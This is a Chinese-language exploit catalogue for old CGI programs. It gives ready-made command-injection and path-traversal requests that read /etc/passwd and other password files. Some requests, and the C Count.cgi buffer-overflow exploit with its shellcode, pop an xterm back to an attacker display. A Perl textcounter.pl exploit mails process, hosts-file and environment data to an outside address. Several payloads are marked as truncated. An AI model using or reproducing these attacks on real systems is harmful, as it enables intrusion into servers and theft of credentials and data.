● phf漏洞
漏洞介绍:phf 是最经典的 CGI 漏洞之一:它没有过滤传入参数中的换行符(URL 编码为 %0a),换行之后的内容会被当作 shell 命令执行,因此可以直接通过浏览器以 Web 服务器进程的身份在服务器上执行命令。下面的例子读取 /etc/passwd:
lynx http://server/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd
● php.cgi 2.0beta10或更早版本的漏洞
漏洞介绍:php.cgi 会把参数直接当作文件名读出来,因此可以读取 Web 服务器进程(通常是 nobody)有权限读取的任何文件。
lynx http://server/cgi-bin/php.cgi?/etc/passwd
注意:
php.cgi 2.1 只允许读取 .shtml 文件。另外要注意,不少系统的口令散列并不放在 /etc/passwd 里,而是在 /etc/master.passwd、/etc/security/passwd 等路径下。
● whois_raw.cgi
lynx http://server/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
lynx http://server/cgi-bin/whois_raw.cgi?fqdn=%0a/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
(第二个例子让服务器向攻击者的 X display 弹回一个 xterm,前提是该 display 允许远程连接;graziella.lame.org:0 只是示例地址,需换成自己的。)
● faxsurvey
lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
● textcounter.pl
漏洞介绍:如果服务器上有 textcounter.pl,任何人都可以以 http 守护进程的权限执行命令。下面的脚本把命令塞进所请求的 .shtml 页面 URL 里,并用 ${IFS} 代替空格绕过过滤;使用前请先修改脚本顶部的 URL 和邮件地址。
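#!/usr/bin/perl
# Exploit for textcounter.pl: the counter hands part of the requested URL to a
# shell, so a command embedded in the URL runs with the web server's privileges.
# Every space in the command is rewritten as ${IFS} so it survives in a URL.
#
# Restored from a case-folded listing: Perl's @ARGV and the shell's IFS
# variable are upper-case, and "-sanother_one" was one string that had been
# wrapped across two lines.
$url='http://dtp.kappa.ro/a/test.shtml';   # please _do_ _modify_ this
$email='pdoru@pop3.kappa.ro,root';         # please _do_ _modify_ this

if ($ARGV[0]) {
    # command supplied on the command line
    $cmd=$ARGV[0];
} else {
    # default: mail the process list, the hosts file reached via ../../../etc
    # (presumably /etc/hosts) and the shell environment to $email
    $cmd="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${email} -sanother_one";
}

# IFS=8 makes the shell split words on '8', so ${IFS} below acts as a space
$text="${url}/;IFS=\8;${cmd};echo|";
$text =~ s/ /\$\{IFS\}/g;
# print "$text\n";

# request the page twice, as the original did; wget's -o only redirects its log
system({"wget"} "wget", $text, "-o/dev/null");
system({"wget"} "wget", $text, "-o/dev/null");
# system({"lynx"} "lynx", $text);   # use lynx if wget is not available
# system({"lynx"} "lynx", $text);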
● info2www 某些版本(1.1)的漏洞(下面是在本机直接调用 CGI 的演示;原文里 `</etc/passwd` 的 `<` 重定向符在抓取时被当作 HTML 标签吞掉,这里按上下文补回)
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
$
you have new mail.
$
● pfdispaly.cgi
lynx -source \
'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdispaly.cgi(注意:程序的真实文件名就是这样拼写的)还有另外一个漏洞可以执行命令:
lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0a/bin/uname%20-a|'
or
lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0a/usr/bin/X11/xclock%20-display%20evil:0.0|'
● wrap
lynx http://server/cgi-bin/wrap?/../../../../../etc
● www-sql
www-sql 可以让入侵者绕过 HTTP 认证读取受保护的页面。例如在浏览器里直接输入 http://server/protected/something.html 会被要求输入账号和口令,而经由 www-sql 请求同一页面就不需要认证:
http://server/cgi-bin/www-sql/protected/something.html
● view-source
lynx http://server/cgi-bin/view-source?../../../../../../../etc/passwd
● campas
lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a
● webgais
telnet www.victim.com 80
post /cgi-bin/webgais http/1.0
Content-Length: 85 (replace this with the actual length of the "exploit" line)
query=';mail+drazvan\@pop3.kappa.roparagraph
(此行在抓取时被截断:`.ro` 与 `paragraph` 之间原本的内容(疑似以 `<` 开头、被当作 HTML 标签吞掉)已丢失,完整载荷无法从本页恢复。)
● websendmail
telnet www.victim.com 80
post /cgi-bin/websendmail http/1.0
Content-Length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.orgubject=a&content=a
(此行同样在抓取时丢失了一段内容,`.org` 之后的原始载荷无法从本页恢复。)
● handler
telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=download HTTP/1.0
或:
get /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=download
或:
get /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=download
注意:
cat 与 /etc/passwd 之间必须是一个 Tab 而不是空格;服务器会报告打不开 useless_shit,但 `;` 之后的命令仍会被执行。
● test-cgi
lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
cgi/1.0 test script report:
argc is 0. argv is .
server_software = ncsa/1.4b
server_name = victim.com
gateway_interface = cgi/1.1
server_protocol = http/1.0
server_port = 80
request_method = get
http_accept = text/plain, application/x-html, application/html,
text/html, text/x-html
path_info =
path_translated =
script_name = /cgi-bin/test-cgi
query_string = whatever
remote_host = xxxx.xxxx.gov
remote_addr = 200.200.200.200
remote_user =
auth_type =
content_type =
content_length =
也可以试着在参数里注入命令(下面 `help&` 后面的 `0a` 看起来应是 URL 编码的换行符 `%0a`):
lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
有时可能也不管用,可尝试:
lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
下面这些请求利用 shell 对未加引号的 `*` 的展开来列出 cgi-bin 目录下的文件,可以逐个尝试:
get /cgi-bin/test-cgi?* http/1.0
get /cgi-bin/test-cgi?x *
get /cgi-bin/nph-test-cgi?* http/1.0
get /cgi-bin/nph-test-cgi?x *
get /cgi-bin/test-cgi?x http/1.0 *
get /cgi-bin/nph-test-cgi?x http/1.0 *
● 对于某些bsd的apache可以:
lynx http://server/root/etc/passwd
lynx http://server/~root/etc/passwd
● htmlscript
lynx http://server/cgi-bin/htmlscript?../../../../etc/passwd
● frontpage extensions
读取 http://www.victim.com/_vti_inf.html 可以得到 FrontPage Extensions 的版本和它在服务器上的安装路径;此外 _vti_pvt 目录下的口令文件如果能被直接下载,就能拿到其中的账号信息,例如:
http://server/_vti_pvt/service.pwd
http://server/_vti_pvt/users.pwd
http://server/_vti_pvt/authors.pwd
http://server/_vti_pvt/administrators.pwd
● vulnerability in glimpse http
telnet target.machine.com 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\md;echo HTTP/1.0
(IFS 与 CMD 是 shell 变量名,原文为大写;`\md` 前后在抓取时丢失了一段内容,原始载荷无法从本页恢复。)
● count.cgi
下面的利用程序只对 Count.cgi(wwwcount)2.4 以下的版本有效,2.4 及以上已修补。程序里版本号写成去掉小数点的形式(-v 22 表示 2.2,可选 15/20/22/23),并且依赖写死的栈地址,换环境时需用 -o 调整偏移。
/*### count.c ########################################################*/
#define _DEFAULT_SOURCE   /* bzero(), gethostbyname() and friends on modern glibc */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/* forwards */
unsigned long getsp(int);          /* stack address to spray, chosen by Count.cgi version */
int usage(char *);                 /* print the synopsis and exit(1); declared int but never returns */
void doit(char *,long, char *);    /* build the request and send it to host:80 */
/* constants */
/*
 * Payload prefix: 22 x 16 bytes of 0x90 (a 352-byte NOP sled), then the
 * x86 Linux shellcode, a run of 0xff filler, and the argv template for the
 * program to spawn.  main() appends the formatted X display string and
 * endpad[] after this.
 *
 * The shellcode bytes read as the usual jmp/call/pop stub followed by an
 * int 0x80 with eax=0x0b (execve) and an exit; the \x88\x46\xNN stores look
 * like they overwrite the '0' characters of the template with NUL
 * terminators at fixed offsets, which is why main() zero-pads the display
 * string to a fixed width -- confirm against a disassembly before relying
 * on that.  The path "/usr/x11r6/..." appears case-folded by extraction;
 * the X11 binaries normally live under /usr/X11R6/bin.
 */
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
/* shellcode proper starts here */
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
/* 0xff filler (the first bytes complete the trailing call's rel32) */
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
/* argv template; '0' marks where separators are expected to be patched */
"/usr/x11r6/bin/xterm0-ut0-display0";
/* trailing filler appended after the display string by main() */
char endpad[]=
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
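/*
 * Entry point.  Parses the options, assembles the payload (shell[] + the
 * formatted X display + endpad[]) and hands it to doit().
 *
 * Options:
 *   -h host        target web server (required)
 *   -d a.b.c.d:n   X display the spawned program should connect back to (required)
 *   -v version     Count.cgi version with the dot removed, e.g. 22 for 2.2;
 *                  selects the stack address via getsp()
 *   -o offset      value added to the address returned by getsp()
 *
 * Fixes against the original listing: sscanf() was passed dotquads[3] by
 * value (missing '&'), so the fourth octet was never read and sscanf wrote
 * through an uninitialised pointer; the payload buffer was sized from the
 * raw optarg rather than the zero-padded display string and had no room
 * for the terminator; host/shellcode were used unchecked when -h or -d was
 * omitted; getopt() ends with -1, not EOF.
 */
int main(int argc, char *argv[])
{
    char *shellcode = NULL;
    char *host = NULL;
    char dispname[255];
    int dotquads[4];
    int dispnum = 0;
    int ver = 0;
    int offset = 0;
    int opt;
    unsigned long sp;

    fprintf(stderr, "\t%s - gus\n", argv[0]);
    if (argc < 3)
        usage(argv[0]);

    while ((opt = getopt(argc, argv, "h:d:v:o:")) != -1) {
        switch (opt) {
        case 'h':
            host = optarg;
            break;
        case 'd': {
            size_t need;
            int got = sscanf(optarg, "%d.%d.%d.%d:%d",
                             &dotquads[0], &dotquads[1],
                             &dotquads[2], &dotquads[3], &dispnum);
            if (got != 5)
                usage(argv[0]);
            /* Zero-padded octets give the display string a fixed width;
             * the NUL patches in shell[] appear to assume that width. */
            snprintf(dispname, sizeof dispname, "%03d.%03d.%03d.%03d:%01d",
                     dotquads[0], dotquads[1], dotquads[2], dotquads[3],
                     dispnum);
            /* Size from the formatted string, not optarg: "1.2.3.4:0" is
             * shorter than "001.002.003.004:0". */
            need = strlen(shell) + strlen(dispname) + strlen(endpad) + 1;
            free(shellcode);            /* -d given twice: drop the first */
            shellcode = malloc(need);
            if (shellcode == NULL) {
                perror("malloc");
                exit(1);
            }
            snprintf(shellcode, need, "%s%s%s", shell, dispname, endpad);
            break;
        }
        case 'v':
            ver = atoi(optarg);
            break;
        case 'o':
            offset = atoi(optarg);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }

    /* Both the target and the display are mandatory; doit() would
     * otherwise dereference NULL. */
    if (host == NULL || shellcode == NULL)
        usage(argv[0]);

    sp = offset + getsp(ver);
    doit(host, (long)sp, shellcode);
    free(shellcode);
    return 0;
}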
/*
 * Return the stack address to use for a given Count.cgi version (written
 * without the dot: 15, 20, 22, 23).  The values are presumably what the
 * author observed on his own builds; the -o option nudges them when they
 * miss.  Any other version prints a hint and exits with status 1.
 */
unsigned long getsp(int ver)
{
    unsigned long addr;

    switch (ver) {
    case 15:
    case 20:
        addr = 0xbfffea50;
        break;
    case 22:
        addr = 0xbfffeab4;
        break;
    case 23:
        addr = 0xbfffee38; /* dunno about this one */
        break;
    default:
        addr = 0;
        break;
    }

    if (addr != 0)
        return addr;

    fprintf(stderr, "i don't have an sp for that version try using the -o option.\n");
    fprintf(stderr, "versions above 24 are patched for this bug.\n");
    exit(1);
}
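/*
 * Print the command-line synopsis to stderr and exit with status 1.
 * Never returns; the int return type only matches the existing prototype.
 *
 * The listing's message appears to have lost its <placeholders> to
 * extraction, leaving "-d -v" with no hint that each option takes an
 * argument; they are restored here from what main() actually parses.
 */
int usage(char *name)
{
    fprintf(stderr, "\tusage: %s -h <host> -d <a.b.c.d:display> -v <version> [-o <offset>]\n", name);
    fprintf(stderr, "\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n", name);
    exit(1);
}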
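/*
 * Open a TCP connection to host:port and return the connected socket.
 * The name is resolved with gethostbyname(); on any failure a message is
 * printed and the process exits with status -1, as the original did.
 *
 * Fixes against the listing: gethostbyname() reports through h_errno, so
 * perror() printed an unrelated errno string; the address was copied with
 * h_length bytes into a 4-byte field without checking the family; the
 * sockaddr was only partially initialised; the socket leaked on a failed
 * connect().
 */
int openhost(char *host, int port)
{
    struct hostent *he;
    struct sockaddr_in sa;
    int sock;

    he = gethostbyname(host);
    if (he == NULL) {
        fprintf(stderr, "bad hostname: %s\n", host);
        exit(-1);
    }
    if (he->h_addrtype != AF_INET || he->h_length != (int)sizeof sa.sin_addr) {
        fprintf(stderr, "bad hostname: %s (not an IPv4 address)\n", host);
        exit(-1);
    }

    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons((unsigned short)port);
    memcpy(&sa.sin_addr, he->h_addr_list[0], sizeof sa.sin_addr);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("cannot open socket");
        exit(-1);
    }
    if (connect(sock, (struct sockaddr *)&sa, sizeof sa) < 0) {
        perror("cannot connect to host");
        close(sock);
        exit(-1);
    }
    return sock;
}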
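/* Byte layout of the string sent as both the query and the User-Agent. */
enum {
    RET_SPRAY_LEN = 4132,   /* "user=a", a NOP, then sp repeated up to here */
    QS_SIZE = 7000
};

/* Store v at p as four little-endian bytes (x86 order). */
static void put_le32(char *p, unsigned long v)
{
    p[0] = (char)(v & 0xff);
    p[1] = (char)((v >> 8) & 0xff);
    p[2] = (char)((v >> 16) & 0xff);
    p[3] = (char)((v >> 24) & 0xff);
}

/* Write all len bytes to fd, retrying on short writes; exits on error. */
static void write_all(int fd, const char *p, size_t len)
{
    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n < 0) {
            perror("write");
            exit(-1);
        }
        p += n;
        len -= (size_t)n;
    }
}

/* Write a NUL-terminated string to fd. */
static void send_str(int fd, const char *s)
{
    write_all(fd, s, strlen(s));
}

/*
 * Build the request and send it to host:80.
 *
 * The payload is: "user=a", one 0x90, then sp repeated little-endian up to
 * byte 4132, then the shellcode (NOP sled + code + display string).  The
 * same string is sent both as the query string and in the User-Agent header
 * (the commented-out local test in the original set both QUERY_STRING and
 * HTTP_USER_AGENT); which of the two Count.cgi overflows is not established
 * by this listing.
 *
 * sp        address to spray as the return address
 * shellcode payload assembled by main(); must be non-NULL
 *
 * Fixes against the listing: "rite(...)" (typo for write) and a one-argument
 * bzero() on an unused VLA did not compile; the request line was
 * case-folded to "get ... http/1.0", but HTTP method names are
 * case-sensitive; the 7000-byte buffer and the shellcode pointer were never
 * checked; write() results were ignored and the socket never closed.
 */
void doit(char *host, long sp, char *shellcode)
{
    char qs[QS_SIZE];
    const char chain[] = "user=a";
    size_t sc_len;
    size_t i;
    int sock;

    if (shellcode == NULL) {
        fprintf(stderr, "doit: no shellcode built (missing -d?)\n");
        exit(-1);
    }
    sc_len = strlen(shellcode);
    if (RET_SPRAY_LEN + sc_len + 1 > sizeof qs) {
        fprintf(stderr, "doit: payload too large for the request buffer\n");
        exit(-1);
    }

    for (i = 0; i < RET_SPRAY_LEN; i += 4)
        put_le32(&qs[i], (unsigned long)sp);

    /* "user=a" presumably keeps Count.cgi treating the query as a parameter
     * list; the byte after it becomes a NOP so there is no embedded NUL. */
    memcpy(qs, chain, sizeof chain - 1);
    qs[sizeof chain - 1] = (char)0x90;
    memcpy(&qs[RET_SPRAY_LEN], shellcode, sc_len + 1);

    sock = openhost(host, 80);
    /* Bare LF line endings are kept as in the original. */
    send_str(sock, "GET /cgi-bin/count.cgi?");
    send_str(sock, qs);
    send_str(sock, " HTTP/1.0\n");
    send_str(sock, "User-Agent: ");
    send_str(sock, qs);
    send_str(sock, "\n\n");
    sleep(1);
    close(sock);
}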